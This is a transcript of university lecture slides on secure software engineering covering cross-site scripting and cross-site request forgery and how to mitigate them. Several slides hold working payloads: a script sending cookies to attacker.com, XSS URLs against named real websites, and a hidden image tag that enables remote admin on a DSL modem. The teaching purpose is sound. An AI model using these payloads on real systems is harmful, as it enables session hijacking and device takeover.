1 / 22

Cross-Site Attacks

Cross-Site Attacks. James Walden Northern Kentucky University. Cross-Site Attacks. Target users of application. Use application feature to reach other users of application. Clients are less well defended than servers.

ajaxe
Download Presentation

Cross-Site Attacks

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Cross-Site Attacks James Walden Northern Kentucky University

  2. Cross-Site Attacks Target users of application. • Use application feature to reach other users of application. • Clients are less well defended than servers. • Obtain assets of individual users rather than assets of entire application. Most common type of attack. • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF) CSC 666: Secure Software Engineering

  3. Cross-Site Scripting (XSS) • Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing. • Impact of XSS • Account hijacking. • Browser hijacking (malware hosting.) • Information leakage (stored form values, etc.) • Virtual defacement. CSC 666: Secure Software Engineering

  4. XSS Examples MySpace worm (October 2005) • When someone viewed Samy’s profile: • Set him as friend of viewer. • Incorporated code in viewer’s profile. Paypal (2006) • XSS redirect used to steal money from Paypal users in a phishing scam. BBC, CBS (2006) • By following XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush appointed a 9-year old as head of the Information Security department. CSC 666: Secure Software Engineering

  5. XSS Key Steps • Attacker sends code to web application. • Legitimate user accesses web app. • Web app sends attacker code to user. • User’s browser executes code. CSC 666: Secure Software Engineering

  6. XSS Example Client browser sends an error message to the web server. https://example.com/error.php?message=Sorry%2C+an +error+occurred CSC 666: Secure Software Engineering

  7. XSS Example The error message is “Reflected” back from the Web server to the client in a web page. CSC 666: Secure Software Engineering

  8. XSS Example We can replace the error with JavaScript https://example.com/error.php?message=<script>alert(‘xss’);</script> CSC 666: Secure Software Engineering

  9. Exploiting the Example • User logins in and is issued a cookie • Attacker feed the URL to user https://example.com/error.php?message=<script>var+i=new+Image;+i.src=“http://attacker.com/”%2bdocument.cookie;</script> CSC 666: Secure Software Engineering

  10. Why does XSS Work? Same-Origin Policy • Browser only allows Javascript from site X to access cookies and other data from site X. • Attacker needs to make attack come from site X. Vulnerable Server Program • Any program that returns user input without filtering out dangerous code. CSC 666: Secure Software Engineering

  11. Reflected XSS • Attack Scenario • User clicks on link. • Injected script returned by one-time message from vulnerable site. • User browser executes injected code. • Limitations • Non-persistent. Only works when user clicks. • Most common type of XSS (~75%). CSC 666: Secure Software Engineering

  12. Anatomy of an XSS Attack Web Server 8. Attacker hijacks user session. 1. Login Attacker User 2. Cookie 5. XSS URL 3. XSS Attack 6. Page with injected code. 7. Browser runs injected code. 4. User clicks on XSS link. Evil site saves ID. CSC 666: Secure Software Engineering

  13. XSS URL Examples http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script> http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(‘Test’);</script> http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1 http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E CSC 666: Secure Software Engineering

  14. Stored XSS • Injected script stored in • Post or comment. • Review. • Uploaded file. • User views page with injected script. • Malicious action is taken while user is logged into site where malware found. • Not technically cross-site. • Attack persists until injected code deleted. CSC 666: Secure Software Engineering

  15. DOM-based XSS Attack scenario • User clicks on URL with crafted Javascript. • Application’s client code extracts data from URL and dynamically updates page with it. • User browser executes crafted Javascript that was inserted in the page. Exploits vulnerability in client code. • Server does not reflect or store evil Javascript. CSC 666: Secure Software Engineering

  16. Mitigating XSS • Disallow HTML input • Allow only safe HTML tags • Filter output Replace HTML special characters in output ex: replace < with &lt; and > with &gt; also replace (, ), #, & • Tagged cookies Include IP address in cookie and only allow access to original IP address that cookie was created for. CSC 666: Secure Software Engineering

  17. Cross-Site Request Forgery A confused deputy attack. • Exploits trust that application has with authentication sessions. Attack scenario: • User authenticates to web application. • User browses to another site containing a malicious CSRF attack link to web app. • iframe, img, link, bgsound, etc. • Browser accesses web app with cached credentials, performing whatever action specified by the link. CSC 666: Secure Software Engineering

  18. Why is the Application Fooled? • Browser sends same GET request if • User submits form. • Browser fetches iframe or img src, etc. • Browser sends cookies with any GET request to appropriate domain + path. • Same origin policy applies to frames, XHRs, but not to HTML tags. CSC 666: Secure Software Engineering

  19. Example: DSL Modem Attack • Home network devs administered via web apps. • Standard local IPs. • Attacker inserts 1-pixel img tag on page. • src is URL of form submission, giving remote admin. • No password needed. • Software owner assumed device on trusted local network. • Of course, browser is on the local network too. <img src="http://192.168.1.254/Forms/remoteRES_1?NSS_RemotePassword=blehblah&NSS_EnableWANAdminAccessRES=on&timeoutDisable=0&Enable=Enable" alt="" width="1" height="1" /> CSC 666: Secure Software Engineering

  20. Mitigating CSRF Require POST for data modifications, but • Many frameworks automatically fetch both types of parameters or convert one to other. • Hidden POST requests can be created with scripts. Check referer header. • But users can block or forge referer header, so it cannot be relied on for everyone. Use nonces. • Random token inserted as hidden parameter, and thus submitted with form. • But XSS can read form, so a combined XSS + CSRF attack can bypass this defense. CSC 666: Secure Software Engineering

  21. Mitigating CSRF Re-authenticate for high value transactions. • Use out of band authentication if possible. Expire session IDs quickly. • But there will always be some time period in which a CSRF attack will work. Automate defenses with tools. • CSRFGuard to insert nonces. • CSRFTester to verify application. CSC 666: Secure Software Engineering

  22. References • Brian Chess and Jacob West, Secure Programming with Static Analysis, Addison-Wesley, 2007. • Seth Fogie et. al., XSS Attacks: Cross-Site Scripting Exploits and Defense, Syngress, 2007. • Michael Howard, David LeBlanc, and John Viega, 19 Deadly Sins of Software Security, McGraw-Hill Osborne, 2005. • Nathan, http://www.neohaxor.org/2008/12/01/csrf-vulns-on-local-network-devices/, 2008. • PCI Security Standards Council, PCI DSS Requirements and Security Assessment Procedures, v1.2, 2008. • Dafydd Stuttart and Marcus Pinto, The Web Application Hacker’s Handbook, Wiley, 2008. CSC 666: Secure Software Engineering

More Related